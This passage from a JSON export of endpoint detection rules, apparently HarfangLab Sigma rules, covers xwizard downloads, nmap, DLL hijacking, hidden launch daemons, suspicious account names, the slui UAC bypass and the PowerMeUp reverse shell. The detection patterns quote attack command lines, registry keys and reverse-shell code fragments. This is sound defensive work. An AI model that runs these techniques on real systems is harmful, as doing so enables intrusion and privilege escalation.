{7940acf8-60ba-4213-a7c3-f3b400ee266d}'\n - 'http'\n\n selection_dll_image:\n - ProcessImage|endswith: '\\rundll32.exe'\n - ProcessOriginalFileName: 'RUNDLL32.EXE'\n\n selection_dll_commandline:\n # rundll32.exe xwizards,RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /zhttps://secure.eicar.org/eicar.com.txt\n CommandLine|contains|all:\n - xwizards\n - '7940acf8-60ba-4213-a7c3-f3b400ee266d'\n\n exclusion_known_fp:\n ParentImage:\n - '?:\\Windows\\System32\\sihost.exe'\n - '?:\\Windows\\explorer.exe'\n\n - '?:\\Windows\\System32\\RuntimeBroker.exe'\n CommandLine: '?:\\WINDOWS\\system32\\xwizard.exe RunWizard {7940ACF8-60BA-4213-A7C3-F3B400EE266D}'\n\n condition: (all of selection_exe_* or all of selection_dll_*) and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "99afba1b-3560-4a5a-8e16-3a4e64477931",
"rule_name": "File Downloaded via Xwizard",
"rule_description": "Detects a suspicious execution of Xwizard executable or DLL to download a file.\nThe downloaded file is saved in one of these locations:\n - %LocalAppData%\\Microsoft\\Windows\\INetCache\\<8_RANDOM_ALNUM_CHARS>\\[1].\n - %LocalAppData%\\Microsoft\\Windows\\INetCache\\IE\\<8_RANDOM_ALNUM_CHARS>\\[1].\nAdversaries may transfer tools or other files to a compromised environment using legitimate tool to evade detection.\nIt is recommended to check the content of the downloaded file and for other suspicious behavior by the parents of the current process.\n",
"rule_creation_date": "2022-11-18",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1105",
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "99bab1be-2133-4c80-99ca-4fc45bb8d6d5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.604032Z",
"creation_date": "2026-03-23T11:45:34.604035Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.604043Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1046/",
"https://attack.mitre.org/techniques/T1049/"
],
"name": "t1046_nmap.yml",
"content": "title: Nmap Execution (Windows)\nid: 99bab1be-2133-4c80-99ca-4fc45bb8d6d5\ndescription: |\n Detects the execution of nmap.\n Nmap is a tool often used by attackers to map networks, services or open ports.\n It is recommended to check if the usage of nmap is legitimate as well as to investigate other suspicious activities in the same user session.\nreferences:\n - https://attack.mitre.org/techniques/T1046/\n - https://attack.mitre.org/techniques/T1049/\ndate: 2021/06/29\nmodified: 2025/10/23\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1046\n - attack.t1049\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.Nmap\n - classification.Windows.Behavior.NetworkScan\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Image|endswith: '\\nmap.exe'\n - OriginalFileName: 'Nmap'\n - InternalName: 'Nmap'\n\n exclusion_embedded:\n Image:\n - '?:\\Program Files\\\\*\\nmap\\nmap.exe'\n - '?:\\Program Files (x86)\\\\*\\nmap\\nmap.exe'\n - '?:\\F-Secure\\RadarScanAgent\\\\*\\nmap\\nmap.exe'\n - '?:\\ManageEngine\\OpManager\\nmap\\nmap.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "99bab1be-2133-4c80-99ca-4fc45bb8d6d5",
"rule_name": "Nmap Execution (Windows)",
"rule_description": "Detects the execution of nmap.\nNmap is a tool often used by attackers to map networks, services or open ports.\nIt is recommended to check if the usage of nmap is legitimate as well as to investigate other suspicious activities in the same user session.\n",
"rule_creation_date": "2021-06-29",
"rule_modified_date": "2025-10-23",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1046",
"attack.t1049"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "99d463a5-30eb-4faf-8a56-3f7379ca3b5f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.601476Z",
"creation_date": "2026-03-23T11:45:34.601479Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.601487Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_storrept.yml",
"content": "title: DLL Hijacking via storrept.exe\nid: 99d463a5-30eb-4faf-8a56-3f7379ca3b5f\ndescription: |\n Detects potential Windows DLL Hijacking via storrept.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'storrept.exe'\n ImageLoaded|endswith:\n - '\\atl.dll'\n - '\\mfc42u.dll'\n - '\\srmtrace.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "99d463a5-30eb-4faf-8a56-3f7379ca3b5f",
"rule_name": "DLL Hijacking via storrept.exe",
"rule_description": "Detects potential Windows DLL Hijacking via storrept.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9a186fde-3db0-40f6-a3c1-0b40019ebb63",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617409Z",
"creation_date": "2026-03-23T11:45:34.617411Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617415Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1543/004/",
"https://attack.mitre.org/techniques/T1564/001/"
],
"name": "t1543_004_launch_daemons_hidden.yml",
"content": "title: Hidden Launch Daemon Created\nid: 9a186fde-3db0-40f6-a3c1-0b40019ebb63\ndescription: |\n Detects the creation of an hidden launch daemon file.\n Adversaries may create hidden files in order to avoid detection from users.\n It is recommended to check the process creating the file for other suspicious behaviors and that the content of the newly created file is legitimate.\nreferences:\n - https://attack.mitre.org/techniques/T1543/004/\n - https://attack.mitre.org/techniques/T1564/001/\ndate: 2024/04/30\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1543.004\n - attack.t1543.001\n - attack.defense_evasion\n - attack.t1564.001\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.Persistence\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_path:\n - Path|startswith:\n - '/System/Library/LaunchDaemons/'\n - '/Library/LaunchDaemons/'\n - TargetPath|startswith:\n - '/System/Library/LaunchDaemons/'\n - '/Library/LaunchDaemons/'\n selection_kind:\n Kind:\n - 'create' # Currently handled by file_event\n - 'rename'\n ProcessImage|contains: '?'\n\n selection_hidden:\n - Path|re: '.*/\\.[^/]*$'\n - TargetPath|re: '.*/\\.[^/]*$'\n\n filter_nosync: # SIP related file\n - Path|endswith: '/.dat.nosync*.??????'\n - TargetPath|endswith: '/.dat.nosync*.??????'\n\n exclusion_common:\n Image:\n - '/usr/bin/rsync'\n - '/usr/bin/sed'\n\n exclusion_temp_file:\n - Image: '/usr/bin/vim'\n Path|endswith: '.swp'\n - Image: '/usr/bin/ditto'\n Path|endswith: '/.BC.T_*'\n - Image: '/usr/bin/ditto'\n TargetPath|endswith: '/.BC.T_*'\n\n exclusion_bomgar:\n - Path:\n - '/Library/LaunchDaemons/.com.bomgar.bomgar-ps-*.helper/run.state'\n - '/Library/LaunchDaemons/.com.bomgar.bomgar-ps-*.helper'\n - ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.bomgar.bomgar-scc'\n\n exclusion_sandbox:\n ProcessParentCommandLine|startswith: '/bin/sh /tmp/PKInstallSandbox.??????/Scripts/'\n\n exclusion_jamf:\n ProcessImage: '/usr/local/jamf/bin/jamf'\n\n exclusion_finder:\n Image: '/System/Library/CoreServices/Finder.app/Contents/MacOS/Finder'\n Path|endswith: '.DS_Store'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9a186fde-3db0-40f6-a3c1-0b40019ebb63",
"rule_name": "Hidden Launch Daemon Created",
"rule_description": "Detects the creation of an hidden launch daemon file.\nAdversaries may create hidden files in order to avoid detection from users.\nIt is recommended to check the process creating the file for other suspicious behaviors and that the content of the newly created file is legitimate.\n",
"rule_creation_date": "2024-04-30",
"rule_modified_date": "2025-10-29",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1543.001",
"attack.t1543.004",
"attack.t1564.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9a250773-45c0-4cf1-860c-4e937e831b2d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077033Z",
"creation_date": "2026-03-23T11:45:34.077035Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077040Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/malmoeb/status/1569441172061585409",
"https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/",
"https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/2022OverWatchThreatHuntingReport.pdf",
"https://assets.sentinelone.com/sentinellabs22/SentinelLabs-BlackBasta",
"https://mp.weixin.qq.com/s/pd6fUs5TLdBtwUHauclDOQ",
"https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/",
"https://attack.mitre.org/techniques/T1078",
"https://attack.mitre.org/techniques/T1098"
],
"name": "t1078_suspicious_user_creation.yml",
"content": "title: Suspicious User Created\nid: 9a250773-45c0-4cf1-860c-4e937e831b2d\ndescription: |\n Detects the creation of user accounts with names that match known patterns or usernames commonly associated with malicious activity.\n The detection focuses on usernames that have been previously identified as suspicious or associated with attacker tradecraft.\n It is recommended to investigate the creation of these accounts, review the permissions and access rights of the new accounts, and remove any unnecessary or unauthorized user accounts.\n Additionally, monitor for repeated attempts to create similar accounts or suspicious patterns of access across the environment.\nreferences:\n - https://twitter.com/malmoeb/status/1569441172061585409\n - https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/\n - https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1\n - https://go.crowdstrike.com/rs/281-OBQ-266/images/2022OverWatchThreatHuntingReport.pdf\n - https://assets.sentinelone.com/sentinellabs22/SentinelLabs-BlackBasta\n - https://mp.weixin.qq.com/s/pd6fUs5TLdBtwUHauclDOQ\n - https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/\n - https://attack.mitre.org/techniques/T1078\n - https://attack.mitre.org/techniques/T1098\ndate: 2022/10/06\nmodified: 2025/02/12\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1078\n - attack.t1098\n - attack.initial_access\n - attack.t1078.002\n - classification.Windows.Source.EventLog\n - classification.Windows.Behavior.Masquerading\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n service: security\ndetection:\n selection:\n Source: 'Microsoft-Windows-Security-Auditing'\n EventID: 4720\n TargetUserName:\n - 'z'\n - 'zz'\n - 'Mysql'\n - 'DefaultAccount?'\n - 'admina'\n - 'Crackenn'\n - 'krtbgt'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9a250773-45c0-4cf1-860c-4e937e831b2d",
"rule_name": "Suspicious User Created",
"rule_description": "Detects the creation of user accounts with names that match known patterns or usernames commonly associated with malicious activity.\nThe detection focuses on usernames that have been previously identified as suspicious or associated with attacker tradecraft.\nIt is recommended to investigate the creation of these accounts, review the permissions and access rights of the new accounts, and remove any unnecessary or unauthorized user accounts.\nAdditionally, monitor for repeated attempts to create similar accounts or suspicious patterns of access across the environment.\n",
"rule_creation_date": "2022-10-06",
"rule_modified_date": "2025-02-12",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1078",
"attack.t1078.002",
"attack.t1098"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9a5109e3-c824-43d7-93a4-914d1f268ff8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.587947Z",
"creation_date": "2026-03-23T11:45:34.587950Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.587968Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_msiexec.yml",
"content": "title: DLL Hijacking via msiexec.exe\nid: 9a5109e3-c824-43d7-93a4-914d1f268ff8\ndescription: |\n Detects potential Windows DLL Hijacking via msiexec.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'msiexec.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\msi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9a5109e3-c824-43d7-93a4-914d1f268ff8",
"rule_name": "DLL Hijacking via msiexec.exe",
"rule_description": "Detects potential Windows DLL Hijacking via msiexec.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9a663634-e603-4974-bddd-b20163a84296",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074122Z",
"creation_date": "2026-03-23T11:45:34.074124Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074128Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/bytecode77/slui-file-handler-hijack-privilege-escalation"
],
"name": "t1548_002_prepare_uac_bypass_slui.yml",
"content": "title: Slui UAC Bypass Prepared\nid: 9a663634-e603-4974-bddd-b20163a84296\ndescription: |\n Detects the preparation of the slui.exe UAC bypass, involving the setting of a registry key.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to analyze the process and user session responsible for the registry edit to look for malicious content or actions.\nreferences:\n - https://github.com/bytecode77/slui-file-handler-hijack-privilege-escalation\ndate: 2020/10/26\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - attack.t1112\n - attack.t1546.001\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.UACBypass\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_set_value:\n EventType: 'SetValue'\n TargetObject:\n - 'HKU\\\\*\\exefile\\shell\\open\\command\\(Default)'\n - 'HKU\\\\*\\exefile\\\\*SymbolicLinkValue'\n filter_is_empty:\n Details: '(Empty)'\n selection_rename:\n EventType:\n - 'RenameValue'\n - 'RenameKey'\n NewName: 'HKU\\\\*_Classes\\exefile\\\\*'\n exclusion_fp:\n # \"%1\" %*\n Details: '\"%1\" %?'\n condition: ((selection_set_value and not 1 of filter_*) or selection_rename) and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9a663634-e603-4974-bddd-b20163a84296",
"rule_name": "Slui UAC Bypass Prepared",
"rule_description": "Detects the preparation of the slui.exe UAC bypass, involving the setting of a registry key.\nAdversaries may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to analyze the process and user session responsible for the registry edit to look for malicious content or actions.\n",
"rule_creation_date": "2020-10-26",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1546.001",
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9ae22815-47dd-4414-9497-a0c0d54a38ce",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.608779Z",
"creation_date": "2026-03-23T11:45:34.608783Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.608790Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/ItsCyberAli/PowerMeUp",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1059_001_powermeup_powershell_tool.yml",
"content": "title: PowerMeUp PowerShell Script Execution\nid: 9ae22815-47dd-4414-9497-a0c0d54a38ce\ndescription: |\n Detects the usage of PowerMeUp, a PowerShell reverse shell that allows attackers to execute various commands as well as design custom post-exploitation scripts.\n Attackers may use reverse shells to bypass firewalls and security restrictions, establish a remote connection to a compromised system, and execute commands with elevated privileges.\n It is recommended to analyze the parent process as well as investigate actions taken by the reverse shell following this alert.\nreferences:\n - https://github.com/ItsCyberAli/PowerMeUp\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2022/10/26\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Framework.PowerMeUp\n - classification.Windows.Behavior.RemoteShell\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection_main:\n PowershellCommand|contains|all:\n - '$RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length'\n - 'Invoke-Expression ($Code) 2>&1'\n - '$Buffer = New-Object System.Byte[] 1024'\n\n selection_bsod:\n PowershellCommand|contains: 'Write-Host \"[+]Sending BSOD to $env:COMPUTERNAME...\"'\n\n selection_disablemonitor:\n PowershellCommand|contains|all:\n - 'SendMessage('\n - '(IntPtr)0xffff, // HWND_BROADCAST'\n - '0x0112, // WM_SYSCOMMAND'\n - '(IntPtr)0xf170, // SC_MONITORPOWER'\n - '(IntPtr)0x0002 // POWER_OFF'\n\n selection_gps:\n PowershellCommand|contains: 'Write-host \"Retrieving geolocation for\" $($latitude) $($longitude)'\n\n selection_wifi:\n PowershellCommand|contains: 'netsh wlan show profiles | Select-String -Pattern \"(?<=^.+: ).+$\" | ForEach-Object -Process {'\n\n selection_scan:\n PowershellCommand|contains|all:\n - 'Write-Host(\"`r`n[*] Running portscan on discovered hosts...\")'\n - 'Write-Host(\"`r`n[+]Port \" + $top1000[$port] + \" is open on $_!\")'\n\n selection_externalip:\n PowershellCommand|contains: '$StreamWriter.Write( (Invoke-RestMethod \"https://myexternalip.com/raw\" | Out-String) )'\n\n condition: 1 of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9ae22815-47dd-4414-9497-a0c0d54a38ce",
"rule_name": "PowerMeUp PowerShell Script Execution",
"rule_description": "Detects the usage of PowerMeUp, a PowerShell reverse shell that allows attackers to execute various commands as well as design custom post-exploitation scripts.\nAttackers may use reverse shells to bypass firewalls and security restrictions, establish a remote connection to a compromised system, and execute commands with elevated privileges.\nIt is recommended to analyze the parent process as well as investigate actions taken by the reverse shell following this alert.\n",
"rule_creation_date": "2022-10-26",
"rule_modified_date": "2025-02-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9afca8ef-febf-42db-9ff5-b82567cb4c5b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
